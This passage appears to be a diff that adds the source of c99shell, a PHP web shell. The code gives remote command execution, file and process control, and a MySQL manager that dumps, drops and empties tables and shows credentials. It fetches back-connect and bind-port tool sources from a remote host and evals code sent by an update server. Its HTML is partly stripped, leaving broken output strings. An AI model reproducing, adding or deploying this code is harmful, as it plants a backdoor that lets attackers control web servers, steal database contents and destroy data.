passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } +} +return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ +if (($mode & 0xC000) === 0xC000) {$type = "s";} +elseif (($mode & 0x4000) === 0x4000) {$type = "d";} +elseif (($mode & 0xA000) === 0xA000) {$type = "l";} +elseif (($mode & 0x8000) === 0x8000) {$type = "-";} +elseif (($mode & 0x6000) === 0x6000) {$type = "b";} +elseif (($mode & 0x2000) === 0x2000) {$type = "c";} +elseif (($mode & 0x1000) === 0x1000) {$type = "p";} +else {$type = "?";} + +$owner["read"] = ($mode & 00400)?"r":"-"; +$owner["write"] = ($mode & 00200)?"w":"-"; +$owner["execute"] = ($mode & 00100)?"x":"-"; +$group["read"] = ($mode & 00040)?"r":"-"; +$group["write"] = ($mode & 00020)?"w":"-"; +$group["execute"] = ($mode & 00010)?"x":"-"; +$world["read"] = ($mode & 00004)?"r":"-"; +$world["write"] = ($mode & 00002)? "w":"-"; +$world["execute"] = ($mode & 00001)?"x":"-"; + +if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} +if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} +if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + +return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return false;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return false;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return false;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ +if (($mode & 0xC000) === 0xC000) {$t = "s";} +elseif (($mode & 0x4000) === 0x4000) {$t = "d";} +elseif (($mode & 0xA000) === 0xA000) {$t = "l";} +elseif (($mode & 0x8000) === 0x8000) {$t = "-";} +elseif (($mode & 0x6000) === 0x6000) {$t = "b";} +elseif (($mode & 0x2000) === 0x2000) {$t = "c";} +elseif (($mode & 0x1000) === 0x1000) {$t = "p";} +else {$t = "?";} +$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; +$g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; +$w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; +return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ +$one = intval($sort); +$second = substr($sort,-1); +if ($second != "d") {$second = "a";} +return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ +if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} +elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} +else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ +global $c99sh_sourcesurl; +$array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", +); +$name = $array[$fn]; +if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} +else {return false;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = true) +{ +$url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; +$data = @file_get_contents($url); +if (!$data) {return "Can't connect to update-server!";} +else +{ + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} +} +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ +global $shver; +$sock = $set["sock"]; +$db = $set["db"]; +$print = $set["print"]; +$nl2br = $set["nl2br"]; +$file = $set["file"]; +$add_drop = $set["add_drop"]; +$tabs = $set["tabs"]; +$onlytabs = $set["onlytabs"]; +$ret = array(); +$ret["err"] = array(); +if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} +if (empty($db)) {$db = "db";} +if (empty($print)) {$print = 0;} +if (empty($nl2br)) {$nl2br = 0;} +if (empty($add_drop)) {$add_drop = true;} +if (empty($file)) +{ + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; +} +if (!is_array($tabs)) {$tabs = array();} +if (empty($add_drop)) {$add_drop = true;} +if (sizeof($tabs) == 0) +{ + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} +} +$out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; +$c = count($onlytabs); +foreach($tabs as $tab) +{ + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } +} +$out .= "#---------------------------------------------------------------------------------\n\n"; +if ($file) +{ + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } +} +if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} +return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ +if (!is_array($array)) {$array = array();} +$result = ""; +foreach($array as $k=>$v) +{ + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; +} +$result = substr($result,0,strlen($result)-strlen($sep)); +return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ +if ($sock) {$result = mysql_query($query,$sock);} +else {$result = mysql_query($query);} +$array = array(); +while ($row = mysql_fetch_array($result)) {$array[] = $row;} +mysql_free_result($result); +return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ +if ($sock) {$error = mysql_error($sock);} +else {$error = mysql_error();} +$error = htmlspecialchars($error); +return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ +global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; +if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} +if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} +if ((!$submit) or ($sql_act)) +{ + echo ""; + if ($tbl_struct) + { + echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



     
    Fields:
    "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
    ";} + echo "
    "; + } +} +if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ +$sql = "CREATE DATABASE `".addslashes($db)."`;"; +if ($sock) {return mysql_query($sql,$sock);} +else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ +$query = trim($query); +$arr = explode (" ",$query); +/*array array() +{ + "METHOD"=>array(output_type), + "METHOD1"... + ... +} +if output_type == 0, no output, +if output_type == 1, no output if no error +if output_type == 2, output without control-buttons +if output_type == 3, output with control-buttons +*/ +$types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) +); +$result = array(); +$op = strtoupper($arr[0]); +if (is_array($types[$op])) +{ + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } +} +else {return false;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ +global $found; +global $found_d; +global $found_f; +global $search_i_f; +global $search_i_d; +global $a; +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +$h = opendir($d); +while (($f = readdir($h)) !== false) +{ + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } +} +closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ +global $gzipencode,$ft; +if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) +{ + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); +} +} +function c99shexit() +{ +onphpshutdown(); +exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ +$tmpdir = ini_get("upload_tmp_dir"); +if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ +$safemode = true; +$hsafemode = "ON (secure)"; +} +else {$safemode = false; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} +else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><?php echo getenv("HTTP_HOST"); ?> - c99shell

    !C99Shell v. !

    Software:  

    uname -a: ",1); ?> 

    ",1);} else {echo get_current_user();} ?> 

    Safe-mode: 

    ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; +$i++; +} +echo "   "; +if (is_writable($d)) +{ +$wd = true; +$wdt = "[ ok ]"; +echo "".view_perms(fileperms($d)).""; +} +else +{ +$wd = false; +$wdt = "[ Read-Only ]"; +echo "".view_perms_color($d).""; +} +if (is_callable("disk_free_space")) +{ +$free = disk_free_space($d); +$total = disk_total_space($d); +if ($free === false) {$free = 0;} +if ($total === false) {$total = 0;} +if ($free < 0) {$free = 0;} +if ($total < 0) {$total = 0;} +$used = $total-$free; +$free_percent = round(100/($total/$free),2); +echo "
    Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; +} +echo "
    "; +$letters = ""; +if ($win) +{ +$v = explode("\\",$d); +$v = $v[0]; +foreach (range("a","z") as $letter) +{ + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "".$letter."";} + $letters .= " ] "; + } +} +if (!empty($letters)) {echo "Detected drives: ".$letters."
    ";} +} +if (count($quicklaunch) > 0) +{ +foreach($quicklaunch as $item) +{ + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; +} +} +echo "


    "; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
    ".$donated_html."

    ";} +echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode(" ",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i])."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode(" ",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo ""; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "
    "; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ +$sql_surl = $surl."act=sql"; +if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} +if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} +if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} +if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} +if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} +$sql_surl .= "&"; +?>

    Attention! SQL-Manager is NOT ready module! Don't reports bugs.

    "; +if (!$sql_sock) {?>"; +} +echo "
    SQL Manager:
    "; +if (!$sql_sock) +{ + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
    Can't connect
    "; echo "".$err."";} +} +else +{ + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; +} +echo "
    i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  •  Please, fill the form:
    UsernamePassword Database 
    HostPORT
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>
    Home

    Please, select database
    "; + //Start center panel + $diplay = true; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + if ($sql_act == "newtbl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = false; + echo "
    SQL-Dump:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

    "; + echo "Download:  

    "; + echo "Save to file:  "; + echo "



    1 - all, if empty"; + echo "
    "; + } + else + { + $diplay = true; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = true; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "Structure ]   "; + echo "Browse ]   "; + echo "Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
    "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    From:  To:  
    "; + echo "
